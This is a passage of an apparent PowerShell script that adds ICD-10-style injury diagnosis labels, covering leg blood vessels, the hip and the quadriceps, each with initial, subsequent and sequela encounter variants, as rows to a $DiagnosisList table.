leg","Major laceration of femoral artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, left leg","Major laceration of femoral artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, unspecified leg","Major laceration of femoral artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, unspecified leg","Major laceration of femoral artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, unspecified leg","Major laceration of femoral artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, right leg","Other specified injury of femoral artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, right leg","Other specified injury of femoral artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, right leg","Other specified injury of femoral artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, left leg","Other specified injury of femoral artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, left leg","Other specified injury of femoral artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, left leg","Other specified injury of femoral artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, unspecified leg","Other specified injury of femoral artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, unspecified leg","Other specified injury of femoral artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral artery, unspecified leg","Other specified injury of femoral artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, right leg","Unspecified injury of femoral vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, right leg","Unspecified injury of femoral vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, right leg","Unspecified injury of femoral vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, left leg","Unspecified injury of femoral vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, left leg","Unspecified injury of femoral vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, left leg","Unspecified injury of femoral vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, unspecified leg","Unspecified injury of femoral vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, unspecified leg","Unspecified injury of femoral vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral vein at hip and thigh level, unspecified leg","Unspecified injury of femoral vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, right leg","Minor laceration of femoral vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, right leg","Minor laceration of femoral vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, right leg","Minor laceration of femoral vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, left leg","Minor laceration of femoral vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, left leg","Minor laceration of femoral vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, left leg","Minor laceration of femoral vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, unspecified leg","Minor laceration of femoral vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, unspecified leg","Minor laceration of femoral vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral vein at hip and thigh level, unspecified leg","Minor laceration of femoral vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, right leg","Major laceration of femoral vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, right leg","Major laceration of femoral vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, right leg","Major laceration of femoral vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, left leg","Major laceration of femoral vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, left leg","Major laceration of femoral vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, left leg","Major laceration of femoral vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, unspecified leg","Major laceration of femoral vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, unspecified leg","Major laceration of femoral vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral vein at hip and thigh level, unspecified leg","Major laceration of femoral vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, right leg","Other specified injury of femoral vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, right leg","Other specified injury of femoral vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, right leg","Other specified injury of femoral vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, left leg","Other specified injury of femoral vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, left leg","Other specified injury of femoral vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, left leg","Other specified injury of femoral vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, unspecified leg","Other specified injury of femoral vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, unspecified leg","Other specified injury of femoral vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of femoral vein at hip and thigh level, unspecified leg","Other specified injury of femoral vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, right leg","Unspecified injury of greater saphenous vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, right leg","Unspecified injury of greater saphenous vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, right leg","Unspecified injury of greater saphenous vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, left leg","Unspecified injury of greater saphenous vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, left leg","Unspecified injury of greater saphenous vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, left leg","Unspecified injury of greater saphenous vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg","Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg","Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg","Unspecified injury of greater saphenous vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, right leg","Minor laceration of greater saphenous vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, right leg","Minor laceration of greater saphenous vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, right leg","Minor laceration of greater saphenous vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, left leg","Minor laceration of greater saphenous vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, left leg","Minor laceration of greater saphenous vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, left leg","Minor laceration of greater saphenous vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg","Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg","Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg","Minor laceration of greater saphenous vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, right leg","Major laceration of greater saphenous vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, right leg","Major laceration of greater saphenous vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, right leg","Major laceration of greater saphenous vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, left leg","Major laceration of greater saphenous vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, left leg","Major laceration of greater saphenous vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, left leg","Major laceration of greater saphenous vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, unspecified leg","Major laceration of greater saphenous vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, unspecified leg","Major laceration of greater saphenous vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of greater saphenous vein at hip and thigh level, unspecified leg","Major laceration of greater saphenous vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, right leg","Other specified injury of greater saphenous vein at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, right leg","Other specified injury of greater saphenous vein at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, right leg","Other specified injury of greater saphenous vein at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, left leg","Other specified injury of greater saphenous vein at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, left leg","Other specified injury of greater saphenous vein at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, left leg","Other specified injury of greater saphenous vein at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg","Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg","Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg","Other specified injury of greater saphenous vein at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, right leg","Unspecified injury of other blood vessels at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, right leg","Unspecified injury of other blood vessels at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, right leg","Unspecified injury of other blood vessels at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, left leg","Unspecified injury of other blood vessels at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, left leg","Unspecified injury of other blood vessels at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, left leg","Unspecified injury of other blood vessels at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, unspecified leg","Unspecified injury of other blood vessels at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, unspecified leg","Unspecified injury of other blood vessels at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at hip and thigh level, unspecified leg","Unspecified injury of other blood vessels at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, right leg","Laceration of other blood vessels at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, right leg","Laceration of other blood vessels at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, right leg","Laceration of other blood vessels at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, left leg","Laceration of other blood vessels at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, left leg","Laceration of other blood vessels at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, left leg","Laceration of other blood vessels at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, unspecified leg","Laceration of other blood vessels at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, unspecified leg","Laceration of other blood vessels at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at hip and thigh level, unspecified leg","Laceration of other blood vessels at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, right leg","Other specified injury of other blood vessels at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, right leg","Other specified injury of other blood vessels at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, right leg","Other specified injury of other blood vessels at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, left leg","Other specified injury of other blood vessels at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, left leg","Other specified injury of other blood vessels at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, left leg","Other specified injury of other blood vessels at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, unspecified leg","Other specified injury of other blood vessels at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, unspecified leg","Other specified injury of other blood vessels at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at hip and thigh level, unspecified leg","Other specified injury of other blood vessels at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, right leg","Unspecified injury of unspecified blood vessel at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, right leg","Unspecified injury of unspecified blood vessel at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, right leg","Unspecified injury of unspecified blood vessel at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, left leg","Unspecified injury of unspecified blood vessel at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, left leg","Unspecified injury of unspecified blood vessel at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, left leg","Unspecified injury of unspecified blood vessel at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Unspecified injury of unspecified blood vessel at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, right leg","Laceration of unspecified blood vessel at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, right leg","Laceration of unspecified blood vessel at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, right leg","Laceration of unspecified blood vessel at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, left leg","Laceration of unspecified blood vessel at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, left leg","Laceration of unspecified blood vessel at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, left leg","Laceration of unspecified blood vessel at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, unspecified leg","Laceration of unspecified blood vessel at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, unspecified leg","Laceration of unspecified blood vessel at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at hip and thigh level, unspecified leg","Laceration of unspecified blood vessel at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, right leg","Other specified injury of unspecified blood vessel at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, right leg","Other specified injury of unspecified blood vessel at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, right leg","Other specified injury of unspecified blood vessel at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, left leg","Other specified injury of unspecified blood vessel at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, left leg","Other specified injury of unspecified blood vessel at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, left leg","Other specified injury of unspecified blood vessel at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg","Other specified injury of unspecified blood vessel at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of right hip","Unspecified injury of muscle, fascia and tendon of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of right hip","Unspecified injury of muscle, fascia and tendon of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of right hip","Unspecified injury of muscle, fascia and tendon of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of left hip","Unspecified injury of muscle, fascia and tendon of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of left hip","Unspecified injury of muscle, fascia and tendon of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of left hip","Unspecified injury of muscle, fascia and tendon of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of unspecified hip","Unspecified injury of muscle, fascia and tendon of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of unspecified hip","Unspecified injury of muscle, fascia and tendon of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of unspecified hip","Unspecified injury of muscle, fascia and tendon of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of right hip","Strain of muscle, fascia and tendon of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of right hip","Strain of muscle, fascia and tendon of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of right hip","Strain of muscle, fascia and tendon of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of left hip","Strain of muscle, fascia and tendon of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of left hip","Strain of muscle, fascia and tendon of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of left hip","Strain of muscle, fascia and tendon of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of unspecified hip","Strain of muscle, fascia and tendon of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of unspecified hip","Strain of muscle, fascia and tendon of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of unspecified hip","Strain of muscle, fascia and tendon of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of right hip","Laceration of muscle, fascia and tendon of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of right hip","Laceration of muscle, fascia and tendon of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of right hip","Laceration of muscle, fascia and tendon of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of left hip","Laceration of muscle, fascia and tendon of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of left hip","Laceration of muscle, fascia and tendon of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of left hip","Laceration of muscle, fascia and tendon of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of unspecified hip","Laceration of muscle, fascia and tendon of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of unspecified hip","Laceration of muscle, fascia and tendon of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of unspecified hip","Laceration of muscle, fascia and tendon of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of right hip","Other specified injury of muscle, fascia and tendon of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of right hip","Other specified injury of muscle, fascia and tendon of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of right hip","Other specified injury of muscle, fascia and tendon of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of left hip","Other specified injury of muscle, fascia and tendon of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of left hip","Other specified injury of muscle, fascia and tendon of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of left hip","Other specified injury of muscle, fascia and tendon of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of unspecified hip","Other specified injury of muscle, fascia and tendon of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of unspecified hip","Other specified injury of muscle, fascia and tendon of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of unspecified hip","Other specified injury of muscle, fascia and tendon of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right quadriceps muscle, fascia and tendon","Unspecified injury of right quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right quadriceps muscle, fascia and tendon","Unspecified injury of right quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right quadriceps muscle, fascia and tendon","Unspecified injury of right quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left quadriceps muscle, fascia and tendon","Unspecified injury of left quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left quadriceps muscle, fascia and tendon","Unspecified injury of left quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left quadriceps muscle, fascia and tendon","Unspecified injury of left quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified quadriceps muscle, fascia and tendon","Unspecified injury of unspecified quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified quadriceps muscle, fascia and tendon","Unspecified injury of unspecified quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified quadriceps muscle, fascia and tendon","Unspecified injury of unspecified quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of right quadriceps muscle, fascia and tendon","Strain of right quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of right quadriceps muscle, fascia and tendon","Strain of right quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of right quadriceps muscle, fascia and tendon","Strain of right quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of left quadriceps muscle, fascia and tendon","Strain of left quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of left quadriceps muscle, fascia and tendon","Strain of left quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of left quadriceps muscle, fascia and tendon","Strain of left quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified quadriceps muscle, fascia and tendon","Strain of unspecified quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified quadriceps muscle, fascia and tendon","Strain of unspecified quadriceps muscle, fascia and tendon, subsequent encounter") + 